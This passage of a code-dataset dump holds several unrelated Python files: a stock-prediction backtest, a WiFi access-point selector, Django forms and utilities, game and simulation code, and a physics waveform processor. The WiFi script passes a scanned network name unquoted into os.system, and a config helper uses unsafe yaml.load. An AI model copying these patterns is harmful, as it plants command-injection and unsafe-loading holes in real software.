y_train)\r\n'''\r\nresult=pd.DataFrame(result)\r\n#提取预测样本的交易日期\r\nff=Data.iloc[index1,0]\r\n#将预测结果与实践结果整合在一起,进行比较\r\npm1={'交易日期':ff.values,'预测结果':result.iloc[:,0].values,'实际结果':y_test.iloc[:,0].values}\r\nresult1=pd.DataFrame(pm1)\r\nz=result1['预测结果'].values-result1['实际结果'].values\r\nR=len(z[z==0])/len(z)\r\n\r\nr_list=[]\r\nr_trd=[]\r\nfor t in range(len(result1)-1):\r\n if result1['预测结果'].values[t]==1:\r\n p1=data.loc[data['Trddt'].values== result1['交易日期'].values[t],'Clsprc'].values\r\n dt=data.loc[data['Trddt'].values>result1['交易日期'].values[t],['Trddt','Clsprc']]\r\n dt=dt.sort_values('Trddt')\r\n p2=dt['Clsprc'].values[0]\r\n r=(p2-p1)/p1\r\n r_list.append(r)\r\n r_trd.append(result1['交易日期'].values[t])\r\nr_total=sum(r_list)\r\ntrd_r={'交易日期':r_trd,'收益率':r_list}\r\ntrd_r=pd.DataFrame(trd_r)\r\n\r\n","sub_path":"程序与数据/第9章 综合案例2:股票价格趋势预测分析/9.3~9.5.py","file_name":"9.3~9.5.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"170234376","text":"with open('BSSs', 'r') as bss_f:\n import re\n bss_pat = re.compile('\\w{2}:\\w{2}:\\w{2}:\\w{2}:\\w{2}:\\w{2}')\n BSSs = bss_f.read()\n BSSs = bss_pat.findall(BSSs)\n bss_f.close()\n\nwith open('SSIDs', 'r') as ssid_f:\n SSIDs = ssid_f.read()\n SSIDs = SSIDs.split('SSID: ')\n final_SSID = []\n for SSID in SSIDs:\n SSID = SSID.strip()\n if SSID != '':\n final_SSID.append(SSID)\n ssid_f.close()\n\nassert len(BSSs) == len(final_SSID)\n\nSSID_set = set()\nAP_list = []\ncount = 1\nfor i in range(len(BSSs)):\n if final_SSID[i] in SSID_set:\n continue\n print(str(count) + '\\t', end='')\n print(final_SSID[i])\n SSID_set.add(final_SSID[i])\n AP_list.append((BSSs[i], final_SSID[i]))\n count += 1\n\n\nselection = input('\\nPlease choose one AP to connect...(Input the number)\\n')\nchose = AP_list[eval(selection) - 1][1]\nprint('Connect to {}...'.format(chose))\n\nimport os\nos.system('iw dev wlan0 connect' + chose)\n\n\n","sub_path":"select_AP.py","file_name":"select_AP.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"218739707","text":"from typing import Optional\n\nfrom dcs.mission import Mission\n\nfrom game.weather import Clouds, Fog, Conditions, WindConditions\n\n\nclass EnvironmentGenerator:\n def __init__(self, mission: Mission, conditions: Conditions) -> None:\n self.mission = mission\n self.conditions = conditions\n\n def set_clouds(self, clouds: Optional[Clouds]) -> None:\n if clouds is None:\n return\n self.mission.weather.clouds_base = clouds.base\n self.mission.weather.clouds_thickness = clouds.thickness\n self.mission.weather.clouds_density = clouds.density\n self.mission.weather.clouds_iprecptns = clouds.precipitation\n\n def set_fog(self, fog: Optional[Fog]) -> None:\n if fog is None:\n return\n self.mission.weather.fog_visibility = fog.visibility\n self.mission.weather.fog_thickness = fog.thickness\n\n def set_wind(self, wind: WindConditions) -> None:\n self.mission.weather.wind_at_ground = wind.at_0m\n self.mission.weather.wind_at_2000 = wind.at_2000m\n self.mission.weather.wind_at_8000 = wind.at_8000m\n\n def generate(self):\n self.mission.start_time = self.conditions.start_time\n self.set_clouds(self.conditions.weather.clouds)\n self.set_fog(self.conditions.weather.fog)\n self.set_wind(self.conditions.weather.wind)\n","sub_path":"gen/environmentgen.py","file_name":"environmentgen.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"482391888","text":"import base64\nimport json\nimport logging\nimport os\nimport yaml\n\n\nfrom os.path import join\nfrom common.constants import CONFIG_FILE_PATH\nfrom common.constants import KEY_NETWORKER_SERVER\nCOMMON_BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\ndef decode_base64_string(encoded_data):\n \"\"\"Decode the data\n :param encoded_data: Encoded data input\n :return: Decoded string\n \"\"\"\n return str(base64.b64decode(encoded_data), 'utf-8')\n\n\ndef decode_base64_json(encoded_data):\n \"\"\"Decode the Json data\n :param encoded_data: Encoded data input\n :return: Decoded json output\n \"\"\"\n return json.loads(str(base64.b64decode(encoded_data), 'utf-8'))\n\n\ndef get_config(appliance, param, yaml_file_path=join(COMMON_BASE_DIR, CONFIG_FILE_PATH)):\n \"\"\"This function gives the yaml value corresponding to the parameter\n sample Yaml file\n xstream_details:\n xtm_host: 10.100.26.90\n :param appliance: The header name as mentioned in the yaml file (ex:xstream_details)\n :param param: The parameter name who's value is to be determined (ex: xtm_host)\n :param yaml_file_path: Path of yaml file, Default will the config.yaml file\n :return: value corresponding to the parameter in yaml file\n :except: Exception while opening or loading the file\n \"\"\"\n try:\n with open(yaml_file_path, 'r') as f:\n doc = yaml.load(f)\n param_value = doc[appliance][param]\n if param_value == \"\":\n message = 'Value is not updated for the parameter:{} in the yaml config file'\\\n .format(param)\n raise Exception(message)\n return param_value\n except Exception as ex:\n message = \"Exception: An exception occured: {}\".format(ex)\n raise Exception(message)\n\n\ndef dict_to_yaml(data_dict, yaml_file_name):\n \"\"\"Convert the Dictionary to Yaml file\n :param yaml_file_name: File name to save the yaml data\n :param data: Dictionary variable which contains key, value pairs\n :return: Boolean True or False\n \"\"\"\n logging.info('Parsing Config Files')\n try:\n with open(yaml_file_name, 'w') as outfile:\n logging.debug('Opening {}'.format(yaml_file_name))\n # Dumping the data to yaml file\n yaml.dump(data_dict, outfile, default_flow_style=False)\n logging.debug('Successfully converted the Dictionary to Yaml file')\n result_flag = True\n except FileNotFoundError:\n message = 'FileNotFoundError: No such file or directory: {}'.format(yaml_file_name)\n logging.fatal(message)\n raise Exception(message)\n except yaml.YAMLError as exc:\n message = \"Exception: An exception occured: {}\".format(exc)\n logging.fatal(message)\n raise Exception(message)\n except IOError as io_error:\n message = \"Exception: An exception occured: {}\".format(io_error)\n raise Exception(message)\n except Exception as ex:\n message = \"Exception: An exception occured: {}\".format(ex)\n raise Exception(message)\n return result_flag\n\n\ndef get_pg_for_retention_time(networker, retention_period, retention_period_type='Day'):\n \"\"\"\n :param retention_period: Number of Days/Weeks/Months/Years\n :param retention_period_type: If retentionPeriod is 11 and retentionPeriodType is\n Day then backup requested for 11 Days.\n - Default Value: 'Day'\n - Possible Values: 'Day', 'Decade', 'Month', 'Quarter', 'Week', 'Year'\n :return: Name of the Protection Group\n \"\"\"\n try:\n if str.lower(retention_period_type) not in ['day']:\n return \"Invalid type\"\n if retention_period == 15:\n protection_group = networker['pg15']\n elif retention_period == 30:\n protection_group = networker['pg30']\n 
else:\n return \"\"\n return protection_group\n except KeyError:\n return \"\"\n\ndef log_func_calls(log_id):\n def outer_wrap(func):\n def wrap(*args, **kwargs):\n logging.info(\"{} Inside: {}\".format(log_id, func.__name__))\n result = func(*args, **kwargs)\n logging.info(\"{} Exit: {}\".format(log_id, func.__name__))\n return result\n return wrap\n return outer_wrap\n","sub_path":"django_project/common/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
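The log_func_calls decorator above takes a log identifier and wraps a function with entry/exit logging. A short usage sketch; the function name and the 'BACKUP-42' id are arbitrary examples, not names from the repo:

# Usage sketch for log_func_calls, assuming it is imported or in scope.
import logging

logging.basicConfig(level=logging.INFO)

@log_func_calls("BACKUP-42")
def trigger_backup(client_id):
    return "queued for {}".format(client_id)

trigger_backup(7)  # logs "BACKUP-42 Inside: trigger_backup" then "... Exit: ..."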
+{"seq_id":"104077099","text":"import arcade\nfrom game.consts import BULLET_SCALE\nfrom game.physics import PhysicsEngineSimple\nfrom game.managers.sounds_manager import SoundsManager\n\n\nclass Bullet(arcade.Sprite):\n def __init__(self, parent, asset_path, x, y, change_x, change_y, speed):\n super().__init__(asset_path, BULLET_SCALE)\n self.parent = parent\n self.center_x = x\n self.center_y = y\n self.speed = speed\n self.change_x = change_x * speed\n self.change_y = change_y * speed\n self.physics_engine = PhysicsEngineSimple(self)\n self.map = map\n\n def update(self):\n results = self.physics_engine.check(self.parent.game.players_list)\n if len(results) > 0:\n player = results[0]\n player.on_hit()\n SoundsManager.play_sound(\"losing\")\n self.remove_from_sprite_lists()\n\n check_walls = self.physics_engine.check(self.parent.game.map.walls_layer)\n check_collidable = self.physics_engine.check(self.parent.game.map.collidable_objects_layer)\n\n if len(check_walls) + len(check_collidable) > 0:\n self.remove_from_sprite_lists()\n\n self.physics_engine.resolve()\n self.physics_engine.update()\n","sub_path":"game/enemies/bullets.py","file_name":"bullets.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"132343173","text":"# Copyright 2019 Extreme Networks, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\n\nimport os\nimport sys\nimport signal\n\nimport eventlet\nfrom eventlet.green import subprocess\n\nfrom st3tests.base import IntegrationTestCase\nfrom st3tests.fixturesloader import get_fixtures_base_path\n\n__all__ = [\n 'ServiceSetupLogLevelFilteringTestCase'\n]\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nFIXTURES_DIR = get_fixtures_base_path()\n\nST3_CONFIG_INFO_LL_PATH = os.path.join(FIXTURES_DIR, 'conf/st3.tests.api.info_log_level.conf')\nST3_CONFIG_INFO_LL_PATH = os.path.abspath(ST3_CONFIG_INFO_LL_PATH)\n\nST3_CONFIG_DEBUG_LL_PATH = os.path.join(FIXTURES_DIR, 'conf/st3.tests.api.debug_log_level.conf')\nST3_CONFIG_DEBUG_LL_PATH = os.path.abspath(ST3_CONFIG_DEBUG_LL_PATH)\n\nST3_CONFIG_AUDIT_LL_PATH = os.path.join(FIXTURES_DIR, 'conf/st3.tests.api.audit_log_level.conf')\nST3_CONFIG_AUDIT_LL_PATH = os.path.abspath(ST3_CONFIG_AUDIT_LL_PATH)\n\nST3_CONFIG_SYSTEM_DEBUG_PATH = os.path.join(FIXTURES_DIR,\n 'conf/st3.tests.api.system_debug_true.conf')\nST3_CONFIG_SYSTEM_DEBUG_PATH = os.path.abspath(ST3_CONFIG_SYSTEM_DEBUG_PATH)\n\nST3_CONFIG_SYSTEM_LL_DEBUG_PATH = os.path.join(FIXTURES_DIR,\n 'conf/st3.tests.api.system_debug_true_logging_debug.conf')\n\nPYTHON_BINARY = sys.executable\n\nST3API_BINARY = os.path.join(BASE_DIR, '../../../st3api/bin/st3api')\nST3API_BINARY = os.path.abspath(ST3API_BINARY)\n\nCMD = [PYTHON_BINARY, ST3API_BINARY, '--config-file']\n\n\nclass ServiceSetupLogLevelFilteringTestCase(IntegrationTestCase):\n def test_audit_log_level_is_filtered_if_log_level_is_not_debug_or_audit(self):\n # 1. INFO log level - audit messages should not be included\n process = self._start_process(config_path=ST3_CONFIG_INFO_LL_PATH)\n self.add_process(process=process)\n\n # Give it some time to start up\n eventlet.sleep(3)\n process.send_signal(signal.SIGKILL)\n\n # First 3 log lines are debug messages about the environment which are always logged\n stdout = '\\n'.join(process.stdout.read().decode('utf-8').split('\\n')[3:])\n\n self.assertTrue('INFO [-]' in stdout)\n self.assertTrue('DEBUG [-]' not in stdout)\n self.assertTrue('AUDIT [-]' not in stdout)\n\n # 2. DEBUG log level - audit messages should be included\n process = self._start_process(config_path=ST3_CONFIG_DEBUG_LL_PATH)\n self.add_process(process=process)\n\n # Give it some time to start up\n eventlet.sleep(5)\n process.send_signal(signal.SIGKILL)\n\n # First 3 log lines are debug messages about the environment which are always logged\n stdout = '\\n'.join(process.stdout.read().decode('utf-8').split('\\n')[3:])\n\n self.assertTrue('INFO [-]' in stdout)\n self.assertTrue('DEBUG [-]' in stdout)\n self.assertTrue('AUDIT [-]' in stdout)\n\n # 3. 
AUDIT log level - audit messages should be included\n        process = self._start_process(config_path=ST3_CONFIG_AUDIT_LL_PATH)\n        self.add_process(process=process)\n\n        # Give it some time to start up\n        eventlet.sleep(5)\n        process.send_signal(signal.SIGKILL)\n\n        # First 3 log lines are debug messages about the environment which are always logged\n        stdout = '\\n'.join(process.stdout.read().decode('utf-8').split('\\n')[3:])\n\n        self.assertTrue('INFO [-]' not in stdout)\n        self.assertTrue('DEBUG [-]' not in stdout)\n        self.assertTrue('AUDIT [-]' in stdout)\n\n        # 4. INFO log level but system.debug set to True\n        process = self._start_process(config_path=ST3_CONFIG_SYSTEM_DEBUG_PATH)\n        self.add_process(process=process)\n\n        # Give it some time to start up\n        eventlet.sleep(5)\n        process.send_signal(signal.SIGKILL)\n\n        # First 3 log lines are debug messages about the environment which are always logged\n        stdout = '\\n'.join(process.stdout.read().decode('utf-8').split('\\n')[3:])\n\n        self.assertTrue('INFO [-]' in stdout)\n        self.assertTrue('DEBUG [-]' in stdout)\n        self.assertTrue('AUDIT [-]' in stdout)\n\n    def test_kombu_heartbeat_tick_log_messages_are_excluded(self):\n        # 1. system.debug = True config option is set, verify heartbeat_tick message is not logged\n        process = self._start_process(config_path=ST3_CONFIG_SYSTEM_LL_DEBUG_PATH)\n        self.add_process(process=process)\n\n        # Give it some time to start up\n        eventlet.sleep(5)\n        process.send_signal(signal.SIGKILL)\n\n        stdout = '\\n'.join(process.stdout.read().decode('utf-8').split('\\n'))\n        self.assertTrue('heartbeat_tick' not in stdout)\n\n        # 2. system.debug = False, log level is set to debug\n        process = self._start_process(config_path=ST3_CONFIG_DEBUG_LL_PATH)\n        self.add_process(process=process)\n\n        # Give it some time to start up\n        eventlet.sleep(5)\n        process.send_signal(signal.SIGKILL)\n\n        stdout = '\\n'.join(process.stdout.read().decode('utf-8').split('\\n'))\n        self.assertTrue('heartbeat_tick' not in stdout)\n\n    def _start_process(self, config_path):\n        cmd = CMD + [config_path]\n        cwd = os.path.abspath(os.path.join(BASE_DIR, '../../../'))\n        cwd = os.path.abspath(cwd)\n        process = subprocess.Popen(cmd, cwd=cwd,\n                                   stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n                                   shell=False, preexec_fn=os.setsid)\n        return process\n","sub_path":"tests/integration/test_service_setup_log_level_filtering.py","file_name":"test_service_setup_log_level_filtering.py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
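The start / sleep / SIGKILL / read-stdout pattern repeated in these tests can be factored into one helper. A sketch using a plain blocking wait (the tests themselves use eventlet's green subprocess, so this is an assumption about an equivalent stdlib form):

# Illustrative helper for the run-then-inspect-stdout pattern above.
import signal
import subprocess
import time

def run_and_capture(cmd, warmup=5.0):
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    time.sleep(warmup)                # give the service time to start
    proc.send_signal(signal.SIGKILL)
    out, _ = proc.communicate()
    return out.decode("utf-8")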
+{"seq_id":"154711450","text":"import numpy as np\nimport Bleko_pol\nfrom scipy.integrate import solve_bvp\nimport scipy.integrate as integrate\nfrom scipy.integrate import quad\nimport matplotlib.pyplot as plt\nimport matplotlib as plt\nimport math as math\n\n\nN = 1000\nN_plot=100\n\nBleko_pol.k = 1\n\nrho_0 = 0.1\nBleko_pol.rho_0 = rho_0\n\n\nxi_s=0.01\nxi_f=2.5\nxi = 0.3\nBleko_pol.xi = xi\n\n\nbeta = 0.3\nBleko_pol.beta=beta\nalpha = 0.25\nBleko_pol.alpha = alpha\n\nrho = np.linspace(rho_0, 1, N)\nBleko_pol.rho=rho\n\ndef f(rho,y):\n return np.array (Bleko_pol.forSOE(rho, y[0], y[1]))\n\n\ndef bc (ya, yb):\n return np.array (Bleko_pol.forBC(ya[0], ya[1],yb[0], yb[1]))\n \n\ndef Mom(xi):\n Bleko_pol.xi = xi\n y1= rho\n y2 = np.ones(N)\n y_approx = np.array([y1, y2])\n res_a = solve_bvp(f, bc, rho, y_approx)\n y_plot_a = res_a.sol(rho)[0]\n \n y = list(map(Bleko_pol.forIntegrand, y_plot_a))\n return (integrate.simps(y,rho))\n\nprint(Mom(0.3))\n\nimport matplotlib.pyplot as plt\npoints_xi = np.linspace(xi_s,xi_f,N_plot)\npoints_M = list(map(Mom, points_xi))\nplt.plot(points_xi, points_M)\nplt.ylabel('Mom')\nplt.xlabel('xi ')\nplt.show()\n\n\n#Дима - лох","sub_path":"full/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"99117121","text":"from django import forms\nfrom django.forms import *\nfrom aplicacion.models import *\nfrom django.utils.translation import ugettext_lazy as _\nfrom django import forms\nfrom django.contrib.auth import authenticate\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(label='Usuario', max_length=50, widget=forms.TextInput(attrs={'placeholder': 'Usuario', 'class': 'form-control',}))\n password = forms.CharField(label='Clave', max_length=50, widget=forms.PasswordInput(attrs={'placeholder': 'Contraseña','class': 'form-control',}))\n\n def clean(self):\n data = self.cleaned_data\n if data.get('username') is None or data.get('password') is None:\n raise forms.ValidationError(\"Digite ambos campos:\")\n else:\n self.user = authenticate(username=data['username'], password=data['password'])\n if self.user is not None:\n # the password verified for the user\n if not self.user.is_active:\n raise forms.ValidationError(\"El usuario no se encuentra activo en el sistema.\")\n # print(\"The password is valid, but the account has been disabled!\")\n else:\n # the authentication system was unable to verify the username and password\n raise forms.ValidationError(\"La combinacion de usuario y clave no es valida.\")\n return data\n\n\nclass ClienteFrom(ModelForm):\n class Meta:\n model = Cliente\n exclude = ('eliminado',)\n widgets = {\n 'identificacion': TextInput(attrs={'placeholder': 'Identificacion', 'class': 'form-control', 'aria-describedby': 'basic-addon1', 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Identificacion', 'data-content':\"Cedula o identificacion del Cliente (1.234.567.899)\"}),\n 'nombre': TextInput(attrs={'placeholder': 'Nombre', 'class': \"form-control\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Nombre'}),\n 'apellido': TextInput(attrs={'placeholder': 'Apellido', 'class': \"form-control\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Apellido'}),\n 'fecha1': TextInput(attrs={'type': 'number', 'min':'1', 'max': '31', 'placeholder': 'Fecha de cobro 1 (dia de cada mes)', 'class': \"form-control fecha\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Fecha 1', 'data-content':\"Primera fecha de cobro\"}),\n 'fecha2': TextInput(attrs={'type': 'number', 'min':'1', 'max': '31', 'placeholder': 'Fecha de cobro 1 (dia de cada mes) (Opcional)', 'class': \"form-control fecha\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Fecha 2', 'data-content':\"Segunda fecha de cobro\"}),\n 'correo': TextInput(attrs={'placeholder': 'Correo (Opcional)', 'class': \"form-control\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Correo', 'data-content':\"E-mail para contacto del cliente (Opcional)\"}),\n 'referencia': Textarea(attrs={'placeholder': 'Referencia (Opcional)', 'class': \"form-control\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Referencia', 'data-content':\"Persona o entidades las cuales se relaciona el cliente (Opcional)\"}),\n 'empresa': TextInput(attrs={'placeholder': 'Empresa (Opcional)', 'class': \"form-control\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Empresa', 'data-content':\"Lugar de trabajo del cliente (Opcional)\"}),\n }\n error_messages = {\n 'identificacion': {\n 'required': 
(\"Identificacion\"),\n },\n 'nombre': {\n 'required': (\"Nombre\"),\n },\n 'apellido': {\n 'required': (\"Apellido\"),\n },\n 'fecha1':{\n 'required':(\"Fecha de cobro No.1\")\n },\n }\n\n\nclass TelefonoForm(ModelForm):\n class Meta:\n model = Telefono\n exclude = ('eliminado','cliente',)\n widgets = {\n 'telefono': TextInput(attrs={'placeholder': 'Telefono', 'class': \"form-control\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Telefono', 'data-content':\"Telefono fijo o celular\"})}\n error_messages = {'telefono':{'required':(\"Telefono\")}}\n\nclass DireccionForm(ModelForm):\n class Meta:\n model = Direccion\n exclude = ('eliminado','cliente',)\n widgets = {\n 'direccion': TextInput(attrs={'placeholder': 'Direccion', 'class': \"form-control\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Direccion', 'data-content':\"Referencia de la ubicacion a acercarce al cliente\"})}\n error_messages = {'direccion':{'required':(\"Direccion\")}}\n\n\nclass ReciboForm(ModelForm):\n class Meta:\n model = Recibo\n exclude = ('eliminado','fechaRecibo', 'compra',)\n widgets = {\n 'numeroRecibo':TextInput(attrs={'placeholder': 'Numero del Recibo', 'class': \"form-control\"}),\n 'valorAbono':TextInput(attrs={'placeholder': 'ingrese el Valor', 'class': \"form-control\", 'type': \"number\"}),\n 'formaDePago':Select(attrs={'class':'form-control'})}\n error_messages = {'numeroRecibo':{'required':(\"Numero de recibo\")},\n 'valorAbono':{'required':(\"Valor del abono\")}}\n\n\nclass FacturaForm(ModelForm):\n class Meta:\n model = Factura\n exclude = ('eliminado', 'fechaCompra','cliente',)\n widgets = {\n 'numeroFactura': NumberInput(attrs={'placeholder': 'Numero de Factura','class': \"form-control\", 'data-trigger': \"hover\",'title':\"Numero de Factura\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Identificacion de la factura\"}),}\n error_messages = {'numeroFactura':{'required':(\"Numero de la factura\")}}\n\n\nclass DetalleFacturaForm(ModelForm):\n class Meta:\n model = DetalleFactura\n exclude = ('eliminado', 'factura','numeroDetalle')\n widgets = {\n 'cantidad': NumberInput(attrs={'placeholder': 'cantidad','class': \"form-control\", 'data-trigger': \"hover\",'title':\"Cantidad\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Numero de items del producto a comprar\"}),\n 'grupo': Select(attrs={'class': \"form-control\", 'id':'select', 'data-trigger': \"hover\",'title':\"Numero de Factura\"}),\n 'descripcion': Textarea(attrs={'placeholder': 'Descripcion (Opcional)', 'class': \"form-control\", 'data-trigger': \"hover\",'title':\"Descripcion\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Breve descripcion de la Compra\"}),\n\n 'numeroFactura': NumberInput(attrs={'placeholder': 'Numero de Factura','class': \"form-control\", 'data-trigger': \"hover\",'title':\"Numero de Factura\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Identificacion de la factura\"}),\n 'cantidad': NumberInput(attrs={'placeholder': 'cantidad','class': \"form-control\", 'data-trigger': \"hover\",'title':\"Cantidad\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Numero de categorias de productos comprados\"}),\n #'grupo': Select(attrs={'class': \"form-control\", 'id':'select', 'data-trigger': \"hover\",'title':\"Numero de Factura\"}),\n #'descripcion': Textarea(attrs={'placeholder': 'Descripcion (Opcional)', 
'class': \"form-control\", 'data-trigger': \"hover\",'title':\"Descripcion\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Breve descripcion de la Compra\"}),\n 'precio': TextInput(attrs={'placeholder': 'Precio', 'class': \"form-control\", 'data-trigger': \"hover\",'title':\"Precio\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Precio total de la compra (COP)\"})}\n error_messages = {'cantidad':{'required':(\"Cantidad\")},\n 'descripcion':{'required':(\"Descripcion de compra\")},\n 'precio':{'required': (\"Precio\")}}\n\nclass DevolucionForm(ModelForm):\n class Meta:\n model = Devolucion\n exclude = ('eliminado', 'cliente',)\n widgets = {\n 'numeroDevolucion': NumberInput(attrs={'placeholder': 'Numero de Devolucion','class': \"form-control\", 'data-trigger': \"hover\",'title':\"Numero de Devolucion\", 'data-placement': \"top\", 'data-toggle': \"popover\"}),\n 'valor': NumberInput(attrs={'placeholder': 'Valor','class': \"form-control\", 'data-trigger': \"hover\",'title':\"Valor\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Dinero a devolver\"}),\n 'concepto': Textarea(attrs={'placeholder': 'Concepto', 'class': \"form-control\", 'data-trigger': \"hover\",'title':\"Concepto\", 'data-placement': \"top\", 'data-toggle': \"popover\"})}\n error_messages = {'numeroDevolucion':{'required':(\"Numero de la devolucion\")},\n 'valor':{'required':(\"Valor\")},\n 'concepto':{'required':(\"Concepto\")},}\n","sub_path":"aplicacion/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":9027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"287037495","text":"\"\"\"\nANASTASIA\nGML October 2016\n\nWhat ANASTASIA does:\n1) Reads a hdf5 file containing the PMT's CWF and the SiPMs' RWF in ADC counts.\n2) Creates a single \"big\" PMT summing up PMTs' waveforms.\n3) Subtracts the SiPMs' baseline.\n4) Applies zero-suppression to both the big PMT and the individual SiPMs.\n5) Converts the waveforms from adc to pes.\n6) Writes the ZS waveforms in the same file as earrays.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport sys\nfrom time import time\n\nimport numpy as np\nimport tables as tb\nimport scipy as sc\nimport scipy.signal\n\nfrom LogConfig import logger\nfrom Configure import configure, define_event_loop\n\nimport sensorFunctions as snf\nimport wfmFunctions as wfm\n\nfrom RandomSampling import NoiseSampler as SiPMsNoiseSampler\n\"\"\"\n\nANASTASIA\nChangeLog:\n\n14.10 First version.\n\n18.10 Big PMT and ZS methods implemented.\n\n21.10 Several fixes. PRE-RELEASE.\n\n31.10 Baseline subtraction for SiPMs introduced.\n\n\"\"\"\n\n\ndef ANASTASIA(argv):\n \"\"\"\n ANASTASIA driver\n \"\"\"\n DEBUG_LEVEL, INFO, CFP = configure(argv[0], argv[1:])\n\n if INFO:\n print(__doc__)\n\n PATH_IN = CFP[\"PATH_IN\"]\n FILE_IN = CFP[\"FILE_IN\"]\n PATH_DB = CFP[\"PATH_DB\"]\n FIRST_EVT = CFP[\"FIRST_EVT\"]\n LAST_EVT = CFP[\"LAST_EVT\"]\n RUN_ALL = CFP[\"RUN_ALL\"]\n NEVENTS = LAST_EVT - FIRST_EVT\n\n PMT_NOISE_CUT_RAW = CFP[\"PMT_NOISE_CUT_RAW\"]\n PMT_NOISE_CUT_BLR = CFP[\"PMT_NOISE_CUT_BLR\"]\n SIPM_ZS_METHOD = CFP[\"SIPM_ZS_METHOD\"]\n SIPM_NOISE_CUT = CFP[\"SIPM_NOISE_CUT\"]\n\n logger.info(\"Debug level = {}\".format(DEBUG_LEVEL))\n logger.info(\"input file = {}/{}\".format(PATH_IN, FILE_IN))\n logger.info(\"path to database = {}\".format(PATH_DB))\n logger.info(\"First event = {} last event = {} \"\n \"# events requested = {}\".format(FIRST_EVT, LAST_EVT, NEVENTS))\n logger.info(\"ZS method PMTS RAW = {}. \"\n \"Cut value = {}\".format(\"RMS_CUT\", PMT_NOISE_CUT_RAW))\n logger.info(\"ZS method PMTS BLR = {}. \"\n \"Cut value = {}\".format(\"ABSOLUTE\", PMT_NOISE_CUT_BLR))\n logger.info(\"ZS method SIPMS = {}. 
\"\n \"Cut value = {}\".format(SIPM_ZS_METHOD, SIPM_NOISE_CUT))\n\n with tb.open_file(\"{}/{}\".format(PATH_IN, FILE_IN), \"r+\") as h5in:\n pmtblr = h5in.root.RD.pmtblr\n pmtcwf = h5in.root.RD.pmtcwf\n sipmrwf = h5in.root.RD.sipmrwf\n pmtdata = h5in.root.Sensors.DataPMT\n blrdata = h5in.root.Sensors.DataBLR\n sipmdata = h5in.root.Sensors.DataSiPM\n pmtdfraw = snf.read_data_sensors(pmtdata)\n pmtdfblr = snf.read_data_sensors(blrdata)\n sipmdf = snf.read_data_sensors(sipmdata)\n\n NEVT, NPMT, PMTWL = pmtcwf.shape\n NEVT, NSIPM, SIPMWL = sipmrwf.shape\n\n logger.info(\"# events in DST = {}\".format(NEVT))\n logger.info(\"#PMTs = {} #SiPMs = {}\".format(NPMT, NSIPM))\n logger.info(\"PMT WFL = {} SiPM WFL = {}\".format(PMTWL, SIPMWL))\n\n # Calibration constants and their average\n pmt_cal_consts_raw = abs(pmtdfraw[\"adc_to_pes\"].reshape(NPMT, 1))\n pmt_cal_consts_blr = abs(pmtdfblr[\"adc_to_pes\"].reshape(NPMT, 1))\n pmt_ave_consts_raw = np.mean(pmt_cal_consts_raw)\n pmt_ave_consts_blr = np.mean(pmt_cal_consts_blr)\n\n # FEE noise in ADC\n noise_adc = 0.789#h5in.root.MC.FEE.col(\"noise_adc\")[0]\n\n # Create instance of the noise sampler and compute noise thresholds\n sipms_noise_sampler_ = SiPMsNoiseSampler(PATH_DB+\"/NoiseSiPM_NEW.h5\",\n SIPMWL)\n\n # Increate thresholds by 1% for safety\n pmts_noise_threshold_raw_ = (PMT_NOISE_CUT_RAW * NPMT /\n pmt_ave_consts_raw * 1.01)\n 